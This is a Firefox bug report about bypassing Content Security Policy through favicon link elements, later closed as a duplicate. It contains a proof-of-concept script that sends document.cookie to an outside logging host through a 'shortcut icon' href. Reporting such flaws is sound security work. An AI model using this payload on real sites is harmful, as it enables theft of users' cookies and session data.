Closed Bug 1363031 Opened 2 years ago Closed 2 years ago
Bypass of CSP unsafe-inline mode in Firefox 53
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.36 Safari/537.36 Steps to reproduce: We can use unprotected vectors to bypass the CSP defense. PoC: http://server.n0tr00t.com/firefox/ffcsp53.0.2.php --- CSP: header("Content-Security-Policy: default-src 'none' 'unsafe-inline';"); Bypass: x = (new Date()).valueOf(); document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";"; ffn0t= document.head.appendChild(document.createElement("link")); ffn0t.rel = "shortcut icon"; ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie; Actual results: Bypass Expected results: Bypass
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Of course, the closure of the unsafe-inline mode can also perform bypass code.
favicons are currently not governed by CSP in Firefox. They should be, since they can be specified by the document, but the content is not _in_ the document so it's a bit ambiguous.
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1297156
(In reply to Daniel Veditz [:dveditz] from comment #2) > favicons are currently not governed by CSP in Firefox. They should be, since > they can be specified by the document, but the content is not _in_ the > document so it's a bit ambiguous. hello, icon == shortcut,icon ? I tested icon success rate is very low but shortcut icon can trigger stable.
You need to log in before you can comment on or make changes to this bug.